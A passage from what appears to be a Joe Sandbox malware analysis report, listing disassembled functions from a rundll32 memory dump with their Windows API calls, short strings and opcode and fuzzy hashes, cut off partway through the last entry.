                          • Instruction Fuzzy Hash: 20E1AD78602A05CFCB16CF24C5A0A6EB7F2BF65310F104A5ED45B9BB94E730A962CB51
                          Function 7EF216A0 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <nHP}PPS_]HYtY]L
                          • API String ID: 0-2977282155
                          • Opcode ID: 04cb7badba18717d0c1463a4f59623090cc21a23dba52e0168c42481d24c47bc
                          • Instruction ID: 788542a6ce7fd4ea33a22e991f261bc9b5038108dd8d478c9410b05a0a05d690
                          • Opcode Fuzzy Hash: 04cb7badba18717d0c1463a4f59623090cc21a23dba52e0168c42481d24c47bc
                          • Instruction Fuzzy Hash: F512BE78E04269CFDB25CF98C890BDDBBB2BF49304F1081AAD859AB345D7306A85CF54
                          Function 7EF59E98 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: bc62a2ee866a4df67b7d17e44df6f4c5c86da01a24a21d4939b5006984c5ab4e
                          • Instruction ID: 164c3200ab618bfbcd499e3a76240b3e785d697451e78dbc4e7dbf776191fa6b
                          • Opcode Fuzzy Hash: bc62a2ee866a4df67b7d17e44df6f4c5c86da01a24a21d4939b5006984c5ab4e
                          • Instruction Fuzzy Hash: 70C10038605B46CFCB1ACF28C4B066EBBF6BF65200F104A5AC86797B94C731E855CB90
                          Function 7EF675C1 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7EF67615
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale
                          • String ID:
                          • API String ID: 3736152602-0
                          • Opcode ID: 86a28396d8a105b573f8982f2839f72b5ae218af86a63d98aa249ef80d31a323
                          • Instruction ID: bf81144a792264ede91f304817933e884fa618d25c8109bca2f2903715496e6d
                          • Opcode Fuzzy Hash: 86a28396d8a105b573f8982f2839f72b5ae218af86a63d98aa249ef80d31a323
                          • Instruction Fuzzy Hash: A721C23A614206EBDB18AA29DD61AAB77FDEF04304F10407BED06D7AC5EB35D940CB54
                          Function 7EF5A226 Relevance: 1.6, Strings: 1, Instructions: 322COMMONLIBRARYCODE
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: 00dad0c4ef8af29353f1adb669efeb5e609e27b187d611baa8a08bd3281a01ca
                          • Instruction ID: 6de57d64010bc9fac97f1da7749b8cd5595fbe22254b2b125d66feffba0151c9
                          • Opcode Fuzzy Hash: 00dad0c4ef8af29353f1adb669efeb5e609e27b187d611baa8a08bd3281a01ca
                          • Instruction Fuzzy Hash: 60B1F338A02E0ACFCB15CFA4C5B1AAEB7F6BF64204F10491ED457A7F50D632A952CB51
                          Function 7EF59B50 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: ca177fd3d9437e47d11b87c8d6d3e9fae28ec7cb7c85926bb04d87454e80b86e
                          • Instruction ID: 2b5d32490857df9bfbb89dbef0d4a22ca4952d5753b9f96c634a2dc8b07f0ee5
                          • Opcode Fuzzy Hash: ca177fd3d9437e47d11b87c8d6d3e9fae28ec7cb7c85926bb04d87454e80b86e
                          • Instruction Fuzzy Hash: E3B1E37890460BCBDB1ACF68C5746AEB7F5AF62200F104A1AC8B3A7F90D7359641CB51
                          Function 7EF67248 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • EnumSystemLocalesW.KERNEL32(7EF6736E,00000001,00000000,?,-00000050,?,7EF6799F,00000000,?,?,?,00000055,?), ref: 7EF672BA
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: 1ea3af229ba08c5ef232805cb9da4a4653b1511fd245952be5155a0c68071ac4
                          • Instruction ID: 52794c571cd76000f0be10dfed8abeaa6f58fbe000ba98a38fe285ce6b9093cb
                          • Opcode Fuzzy Hash: 1ea3af229ba08c5ef232805cb9da4a4653b1511fd245952be5155a0c68071ac4
                          • Instruction Fuzzy Hash: B911E93B6147059FDB189F39C8A16AAB7E2FF80358B14452DE94787F84D371B542CB50
                          Function 7EF677F0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,7EF6758A,00000000,00000000,?), ref: 7EF6781C
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale
                          • String ID:
                          • API String ID: 3736152602-0
                          • Opcode ID: 13d622d7e087234bdf93731d47546306de1efd07a6c2c67ff0dbb7fd0da61b55
                          • Instruction ID: 1fb8490239c91ee324467ac6d8e7008f9e7dee1e92c3adfde8def91e435fd7f6
                          • Opcode Fuzzy Hash: 13d622d7e087234bdf93731d47546306de1efd07a6c2c67ff0dbb7fd0da61b55
                          • Instruction Fuzzy Hash: 58F0F43AA10112EBEB189A758825BBA37A8EB40354F20442ADC17E39C0EA70FF01C6D0
                          Function 7EF672E3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • EnumSystemLocalesW.KERNEL32(7EF675C1,00000001,00000000,?,-00000050,?,7EF67963,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7EF6732D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: 9fe2f149b9d2d6dc6f6ce65bbffa343a8190ace695ce815f7ee92830253587b4
                          • Instruction ID: c3442266ff98416ed6d7f26585bdf20bb36dbe1dda61d78159d3c05ee9101aa0
                          • Opcode Fuzzy Hash: 9fe2f149b9d2d6dc6f6ce65bbffa343a8190ace695ce815f7ee92830253587b4
                          • Instruction Fuzzy Hash: EEF0F63A3043049FD7155F39D8A1A6A7BE2EF80368B15882EFD468BED0D6719C02CB50
                          Function 7EF60A9F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5C0A0: EnterCriticalSection.KERNEL32(-7EF8B618,?,7EF5DA8E,?,7EF82848,0000000C,7EF5DD78,7EF72040), ref: 7EF5C0AF
                          • EnumSystemLocalesW.KERNEL32(7EF60A92,00000001,7EF82988,0000000C,7EF60F18,00000000), ref: 7EF60AD7
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          • Opcode ID: 263754bd2aabb5eb6687a45860973fd64e2a1c414a3ba73b4c7da1e08a7bd915
                          • Instruction ID: f7f5605652b6a44454d1f4d7e5d696b060519dd9b21ddf412cf4d6e672905e07
                          • Opcode Fuzzy Hash: 263754bd2aabb5eb6687a45860973fd64e2a1c414a3ba73b4c7da1e08a7bd915
                          • Instruction Fuzzy Hash: 52F0493AA08205DFD710DF98D815B9D77F0FB84325F20896BE812DBB90D7755900CB50
                          Function 7EF671FD Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • EnumSystemLocalesW.KERNEL32(7EF67156,00000001,00000000,?,?,7EF679C1,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 7EF67234
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: 056fea1f5ff9d85431f8d3ac6069f901eebd1d8dec66d77f2d73c0d1737cae33
                          • Instruction ID: 0be26c5c302b3633bddc767a011ef2dccd69af897975bae771a93ab83f7a68ce
                          • Opcode Fuzzy Hash: 056fea1f5ff9d85431f8d3ac6069f901eebd1d8dec66d77f2d73c0d1737cae33
                          • Instruction Fuzzy Hash: 2FF0E53A30020597CB059F76C865B6ABFA6FFC1610B06445AEE0ACBA91D6719842CB94
                          Function 7EF6101C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7EF60108,?,20001004,00000000,00000002,?,?,7EF5F70A), ref: 7EF61050
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: dcaaa1af934b8e1084fd9b740767ddc14c22c2af860e69895863624926b08e6a
                          • Instruction ID: de57bc6381d1dccea32695bf62176bbec5c17aa7cab7e6f3eb47387705089d51
                          • Opcode Fuzzy Hash: dcaaa1af934b8e1084fd9b740767ddc14c22c2af860e69895863624926b08e6a
                          • Instruction Fuzzy Hash: 3FE04F3A904658FBCF222F61DC18F9E3F29FF84750F104411FD1A65A60CB718D219AD4
                          Function 7EF3BC90 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: WORKGROUP
                          • API String ID: 0-2380569353
                          • Opcode ID: a637c19b62f1e9790dc0cd4d1d04aaa7fb5c9d8c412ea9e4557a3f286b4c43a4
                          • Instruction ID: 07f7ee40475f116ab55e53358308e9dc0a4131a2fb8309bdefc888bb94f65af2
                          • Opcode Fuzzy Hash: a637c19b62f1e9790dc0cd4d1d04aaa7fb5c9d8c412ea9e4557a3f286b4c43a4
                          • Instruction Fuzzy Hash: 09B1AE78E05258DFDB14CFA8C8A0B9DFBB2BF48304F24819AD959A7345D730AA85CF50
                          Function 7EF3B9A0 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: N/A
                          • API String ID: 3758378126-2525114547
                          • Opcode ID: 853e5f7899b995c1fd21ce74ef05bd0f0ce940b1c60e5767408bba15eaf90ffa
                          • Instruction ID: a93ccf4f34aa4b0d3d0ba12093d63a013f2f3f2dfa79ba29cd4d26157d76f32b
                          • Opcode Fuzzy Hash: 853e5f7899b995c1fd21ce74ef05bd0f0ce940b1c60e5767408bba15eaf90ffa
                          • Instruction Fuzzy Hash: 5CB1C378E04259DFCB14CF99C9A0AEDFBB1BF88304F24819AD849AB345D730AA45CF50
                          Function 7EF288C4 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: e
                          • API String ID: 0-4024072794
                          • Opcode ID: 23252c54b1d05fa9e3eeced2c104efbd0311401e7fd45b4dea3a3284395b342a
                          • Instruction ID: c66900948c80377b6d7f6a4caba559c16c489696d034593bbd68a59434bc5dc3
                          • Opcode Fuzzy Hash: 23252c54b1d05fa9e3eeced2c104efbd0311401e7fd45b4dea3a3284395b342a
                          • Instruction Fuzzy Hash: B5C161B8E05268CFCB64CF58C890B9DBBB1BF48305F1481E9D949A7346D730AA85CF58
                          Function 7EF38560 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: N/A
                          • API String ID: 3758378126-2525114547
                          • Opcode ID: 24ce670bf2805216b6ee58d24c6ddb037c6a8e99699261633c09b63b0a09d8bc
                          • Instruction ID: 1173ba3cf4e581ef36356a40a57ed20324746f1e3f3a1afccf8af9fc4131e02d
                          • Opcode Fuzzy Hash: 24ce670bf2805216b6ee58d24c6ddb037c6a8e99699261633c09b63b0a09d8bc
                          • Instruction Fuzzy Hash: AFB1B178E04258DFCB14CF99C9A0ADDFBB2BF89304F24819AD859AB345D734AA45CF50
                          Function 7EF39770 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: N/A
                          • API String ID: 0-2525114547
                          • Opcode ID: f3b47cd14f72e29bd120167bab01902de2909fe9813d0f3058f2ed3767c102e4
                          • Instruction ID: caed308129d70181fccdabceb9bbbf0a5ec97aa672171f300970a76c38a26ff8
                          • Opcode Fuzzy Hash: f3b47cd14f72e29bd120167bab01902de2909fe9813d0f3058f2ed3767c102e4
                          • Instruction Fuzzy Hash: 0FA1C178E05258DFCB14CF99C890ADDFBB2BF89304F24819AD859A7349D730AA45CF50
                          Function 7EF37090 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: N/A
                          • API String ID: 0-2525114547
                          • Opcode ID: 4fd1269299e2f8634c2a3207b0286c447fe0c2998df831b2643a8c7c586a6033
                          • Instruction ID: 8e392b27775028dedcbb6d3c5831be51224cfffd2c18e927cb7fc270fb93a432
                          • Opcode Fuzzy Hash: 4fd1269299e2f8634c2a3207b0286c447fe0c2998df831b2643a8c7c586a6033
                          • Instruction Fuzzy Hash: E0A19E78E05258DFCB14CF99C990ADEFBB2BF89304F24819AD859A7345D730AA45CF50
                          Function 7EF6570A Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: f126fa3bcba7e87fb95200b1c72d9422e9be36012fa664ddfb603a3765a3bf08
                          • Instruction ID: 9d7cd47eb68b590fbf41aec99446281d454cef99a7dd4bfa65b2aee9595224da
                          • Opcode Fuzzy Hash: f126fa3bcba7e87fb95200b1c72d9422e9be36012fa664ddfb603a3765a3bf08
                          • Instruction Fuzzy Hash: DBA012316001008B83404E3742083193AD869451813600014D006C0540DE3444404600
                          Function 7EF38860 Relevance: .9, Instructions: 863COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aed12523e03ed8c5841269adeebaeab4661bbc9c86ee42139197e118a1ad3f2c
                          • Instruction ID: c4b13d7f055c6f6c10b053b28770eb0aa91b2b605dd8336b7ae49506d4c9ba8f
                          • Opcode Fuzzy Hash: aed12523e03ed8c5841269adeebaeab4661bbc9c86ee42139197e118a1ad3f2c
                          • Instruction Fuzzy Hash: B2A28D78E05269CBDB64CF58C8A4BDDBBB1BF89304F1081DAD849A7355DB30AA85CF50
                          Function 7EF14400 Relevance: .8, Instructions: 827COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                          • Instruction ID: 9a4003a864dab1667e54edf69d6e5e5ae50c4c16e1a81b1efcdd9f567764ce64
                          • Opcode Fuzzy Hash: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                          • Instruction Fuzzy Hash: 8DA28C78E05269CFDB65CF59C8A0B9DBBB2BF89304F1081DAD859A7345D730AA81CF50
                          Function 7EF14954 Relevance: .3, Instructions: 335COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                          • Instruction ID: 1f1b7c0b700e70fe2a5a857b05b2f56aa31f5c150c94d13741fbe57dc1e98901
                          • Opcode Fuzzy Hash: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                          • Instruction Fuzzy Hash: 79127C78E05269CFDB64CF59C994B9DBBB2BF89304F2081D9D849AB345D730AA81CF50
                          Function 7EF66A0C Relevance: .3, Instructions: 327COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                          • String ID:
                          • API String ID: 3471368781-0
                          • Opcode ID: 8790c572dee4da2907ef4a1c4e48e34dbdbff799d3fb544e837752c129fe2500
                          • Instruction ID: 2c4748e1f276044c545fedffd76d89eb766a54921d8b2f7148e85b7c1f910259
                          • Opcode Fuzzy Hash: 8790c572dee4da2907ef4a1c4e48e34dbdbff799d3fb544e837752c129fe2500
                          • Instruction Fuzzy Hash: 51B13739610B01DBDB259F24CCA1BA7B3F9FF40308F05492ED947C6A84EA75E985CB10
                          Function 7EF49510 Relevance: .3, Instructions: 288COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
                          • Instruction ID: 013390d1dd76cd852f69cb84265a7818a83244452251cf749ffc845bc055d375
                          • Opcode Fuzzy Hash: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
                          • Instruction Fuzzy Hash: BDD1C674A01209DFCB05CF59C4A1A9DBBF2FF89314F14D199E81AAB755D731AA81CF80
                          Function 7EF14464 Relevance: .2, Instructions: 225COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
                          • Instruction ID: b29e82dc7a9f0c5e254cb7b260d00215390893da30fdec0ae06383a7ace0dc6c
                          • Opcode Fuzzy Hash: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
                          • Instruction Fuzzy Hash: 1FD16A78E05269CFCB64CF59C990BDDBBB1BF88304F1482DAD849A7355DA30AA85CF50
                          Function 7EF1D3B0 Relevance: .2, Instructions: 222COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48d20a57fc8c72f77a07b5e0ce8f4bca69a7938fa159ea8f54cc6595f0394ca3
                          • Instruction ID: e966f14e3225565cf04249e867d9861ddabc938ea24bf4bd21b263e6236c2e3e
                          • Opcode Fuzzy Hash: 48d20a57fc8c72f77a07b5e0ce8f4bca69a7938fa159ea8f54cc6595f0394ca3
                          • Instruction Fuzzy Hash: 26B1D1B8D04259DFCB14CF98C8A0BEDBBB1BF49304F10829AD819AB345D7316A85CF90
                          Function 7EF1C820 Relevance: .2, Instructions: 222COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e470a9eb18d9cc67ced3c253cc00002261db497c1fd79f9c7e977219a85abdc4
                          • Instruction ID: 0f6169b93dc7cb8118eb64137b4ca2f34bc2d555dc2d22ff71a8c3068bc3c0c2
                          • Opcode Fuzzy Hash: e470a9eb18d9cc67ced3c253cc00002261db497c1fd79f9c7e977219a85abdc4
                          • Instruction Fuzzy Hash: A5B1C0B8D04259DFCB18CF98C8A0BEDBBB1BF49314F108199D859AB745D7346A85CF90
                          Function 7EF1C4D0 Relevance: .2, Instructions: 222COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a09911a2ad928c60c2760ee84fa6cadf8a3f50e64f32c94d25629a4389174144
                          • Instruction ID: e54817445090068ce85125d92b021220f76b8db104943d02dedff6648f95c6e8
                          • Opcode Fuzzy Hash: a09911a2ad928c60c2760ee84fa6cadf8a3f50e64f32c94d25629a4389174144
                          • Instruction Fuzzy Hash: 8DB1B2B8D04259DFCB18CF98C8A0BEDBBB1BF49314F108299D859AB745D7346A85CF90
                          Function 7EF17000 Relevance: .2, Instructions: 214COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                          • Instruction ID: 7072220035980dc3b5673b5d5ee6df82bac6efdefcc8a1cfd6656c88662b7f80
                          • Opcode Fuzzy Hash: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                          • Instruction Fuzzy Hash: 59B1A378E00259DFCB14CF99C590AADFBB2FF89304F208199E859A7755D770AA82CF50
                          Function 7EF17450 Relevance: .2, Instructions: 173COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c1eab5970cad5bb778bd9befc4fd4b303cf43b4b0819ed0f1a60980bec7a5fb
                          • Instruction ID: da098c33e59aaa69e0752d89aad55da6432b4827a15e410d29e58889426fc5b3
